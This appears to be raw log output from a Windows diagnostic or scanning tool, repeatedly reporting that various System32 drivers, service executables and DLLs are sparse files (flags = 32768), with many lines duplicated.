File "C:\Windows\System32\drivers\disk.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\disk.sys" is sparse (flags = 32768)

File "C:\Windows\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\DiagSvcs\DIAGNOSTICSHUB.STANDARDCOLLECTOR.SERVICE.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\dmvsc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\dmvsc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\drmkaud.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\drmkaud.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\serial.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\serial.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\dxgkrnl.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\umpass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\umpass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\tcpip.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\EHSTORCLASS.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\EHSTORCLASS.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\EHSTORTCGDRV.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\errdev.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\errdev.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\parport.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\parport.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\fileinfo.sys" is sparse (flags = 32768)

File "C:\Windows\System32\FXSSVC.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\fdc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\fdc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\FILECRYPT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\FILECRYPT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vmstorfl.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vmstorfl.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ipfltdrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\FILETRACE.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\FILETRACE.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\fltMgr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\FSDEPENDS.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\STORQOSFLT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\STORQOSFLT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\fvevol.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\VMGENCOUNTER.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\VMGENCOUNTER.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ndisuio.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSGPIOCLX.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wanarp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WUDFRd.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\GPUENERGYDRV.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rasl2tp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mrxsmb.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hdaudbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidbth.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidbth.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidi2c.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidi2c.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\HIDINTERRUPT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidir.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidir.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidusb.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hidusb.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\http.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\HVSERVICE.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\HVSERVICE.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vmgid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vmgid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hwpolicy.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hyperkbd.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\hyperkbd.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ndproxy.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\i8042prt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\i8042prt.sys" is sparse (flags = 32768)

File "C:\Windows\SysWOW64\perfhost.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WPDUPFLTR.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WPDUPFLTR.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\INDIRECTKMD.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\INDIRECTKMD.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mouhid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mouhid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\intelide.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\intelide.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\intelpep.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\intelpep.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\intelppm.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\intelppm.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\IPMIDrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\IPMIDrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ipnat.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\irda.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\irenum.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\msiscsi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\msiscsi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\kbdclass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\kbdclass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\kbdhid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\raspppoe.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ksecdd.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ksecpkg.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ksthunk.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\lltdio.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\UCMTCPCICX.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\UCMTCPCICX.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\luafv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\msisadrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\msisadrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mstee.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mmcss.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mskssrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wimmount.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mrxdav.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\modem.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mspqm.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\monitor.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\monitor.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mouclass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mouclass.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mountmgr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mrxsmb10.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mrxsmb20.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\Ucx01000.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ufx01000.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\bridge.sys" is sparse (flags = 32768)

File "C:\Windows\System32\VSSVC.exe" is sparse (flags = 32768)

File "C:\Windows\System32\msdtc.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSGPIOWIN32.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSGPIOWIN32.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSHIDKMDF.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSHIDKMDF.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSHIDUMDF.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MSHIDUMDF.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\msiexec.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mslldp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mssmbios.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\mssmbios.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MTConfig.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\MTConfig.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\nwifi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\nwifi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\netbios.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ndis.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ndiscap.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NDISIMPLATFORM.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NDISIMPLATFORM.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ndistapi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbhub.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbhub.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NDISVIRTUALBUS.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NDISVIRTUALBUS.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ndiswan.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NETADAPTERCX.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NETADAPTERCX.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\netbt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\NPSVCTRIG.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\nsiproxy.sys" is sparse (flags = 32768)

File "C:\Windows\System32\vds.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\partmgr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pcw.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pdc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pcmcia.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pcmcia.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\PEAuth.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\qwavedrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\raspptp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\processr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\processr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\pacer.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rasacd.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\agilevpn.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\agilevpn.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rassstp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rdbss.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rdpbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rdpbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rdpdr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\RDPVIDEOMINIPORT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rdyboost.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\rspndr.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vms3cap.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vms3cap.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sbp2port.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sbp2port.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\swenum.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\swenum.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sdbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\SENSORDATASERVICE.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\SerCx.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\SpbCx.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\serenum.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\serenum.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\SerCx2.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sermouse.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sermouse.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\URSCX01000.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\URSCX01000.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sfloppy.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\sfloppy.sys" is sparse (flags = 32768)

File "C:\Windows\System32\snmptrap.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\SPACEPORT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\sppsvc.exe" is sparse (flags = 32768)

File "C:\Windows\System32\sppsvc.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\srvnet.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\volmgrx.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\storahci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\stornvme.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\storufs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\storufs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\storvsc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\storvsc.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\tcpipreg.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\tdx.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\tpm.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\terminpt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vdrvroot.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vdrvroot.sys" is sparse (flags = 32768)

File "C:\Windows\System32\TIERINGENGINESERVICE.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\TIERINGENGINESERVICE.EXE" is sparse (flags = 32768)

File "C:\Windows\servicing\TRUSTEDINSTALLER.EXE" is sparse (flags = 32768)

File "C:\Windows\servicing\TRUSTEDINSTALLER.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\TsUsbFlt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\TsUsbGD.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\TsUsbGD.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\uaspstor.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\uaspstor.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\UcmCx.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\Udecx.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\udfs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\uefi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\uefi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\UI0DETECT.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\UI0DETECT.EXE" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\umbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\umbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbcir.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbcir.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbehci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbehci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbohci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbohci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbuhci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbuhci.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\USBXHCI.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\USBXHCI.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\USBHUB3.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\USBHUB3.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbprint.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbprint.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbser.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbser.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\USBSTOR.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\USBSTOR.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\usbvideo.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\VERIFIEREXT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\VERIFIEREXT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vhdmp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vhf.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vmbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vmbus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\VMBusHID.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\VMBusHID.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\volsnap.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\volume.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\volume.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vsmraid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vsmraid.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vwifibus.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vwififlt.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\vwifimp.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wacompen.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wacompen.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\winusb.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\winusb.sys" is sparse (flags = 32768)

File "C:\Windows\System32\wbengine.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WdBoot.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\Wdf01000.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WdiWiFi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WdNisDrv.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wfplwfs.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WINDOWSTRUSTEDRT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WINDOWSTRUSTEDRT.SYS" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wmiacpi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\wmiacpi.sys" is sparse (flags = 32768)

File "C:\Windows\System32\wbem\WmiApSrv.exe" is sparse (flags = 32768)

File "C:\Program Files\Windows Media Player\wmpnetwk.exe" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\ws2ifsl.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WSDPrint.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WSDPrint.sys" is sparse (flags = 32768)

File "C:\Windows\System32\drivers\WUDFPf.sys" is sparse (flags = 32768)

File "C:\Windows\System32\AJRouter.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ipnathlp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ipnathlp.dll" is sparse (flags = 32768)

File "C:\Windows\System32\lsm.dll" is sparse (flags = 32768)

File "C:\Windows\System32\umpnpmgr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\rpcss.dll" is sparse (flags = 32768)

File "C:\Windows\System32\appinfo.dll" is sparse (flags = 32768)

File "C:\Windows\System32\appidsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\AxInstSv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dcpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\APPREADINESS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\APPREADINESS.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WALLETSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WALLETSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\audiosrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\audiosrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\RpcEpMap.dll" is sparse (flags = 32768)

File "C:\Windows\System32\CDPUSERSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\CDPUSERSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\dssvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\bdesvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\BFE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\XBLAUTHMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\XBLAUTHMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\netman.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DEVICESETUPMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DEVICESETUPMANAGER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\cdpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\umpo.dll" is sparse (flags = 32768)

File "C:\Windows\System32\qmgr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\ListSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\lltdsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\bisrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\bisrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dhcpcore.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dhcpcore.dll" is sparse (flags = 32768)

File "C:\Windows\System32\browser.dll" is sparse (flags = 32768)

File "C:\Windows\System32\BthHFSrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\BthHFSrv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\profsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\pnrpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\bthserv.dll" is sparse (flags = 32768)

File "C:\Windows\System32\provsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\das.dll" is sparse (flags = 32768)

File "C:\Windows\System32\LICENSEMANAGERSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\certprop.dll" is sparse (flags = 32768)

File "C:\Windows\System32\certprop.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DMWAPPUSHSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DMWAPPUSHSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ClipSVC.dll" is sparse (flags = 32768)

File "C:\Windows\System32\COREMESSAGING.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\COREMESSAGING.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\cryptsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\moshost.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DEFRAGSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DEFRAGSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DEVQUERYBROKER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DEVQUERYBROKER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\wscsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WsmSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WsmSvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wersvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wecsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wcmsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\wkssvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dot3svc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\DIAGTRACK.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\DIAGTRACK.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\fdPHost.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dnsrslvr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dnsrslvr.dll" is sparse (flags = 32768)

File "C:\Windows\System32\dps.dll" is sparse (flags = 32768)

File "C:\Windows\System32\WERCPLSUPPORT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\WERCPLSUPPORT.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\eapsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\efssvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\EMBEDDEDMODESVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\EMBEDDEDMODESVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FntCache.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FntCache.dll" is sparse (flags = 32768)

File "C:\Windows\System32\es.dll" is sparse (flags = 32768)

File "C:\Windows\System32\sdrsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FRAMESERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\FRAMESERVER.DLL" is sparse (flags = 32768)

File "C:\Windows\System32\srvsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\FDResPub.dll" is sparse (flags = 32768)

File "C:\Windows\System32\fhsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\fhsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\gpsvc.dll" is sparse (flags = 32768)

File "C:\Windows\System32\hidserv.dll" is sparse (flags = 32768)

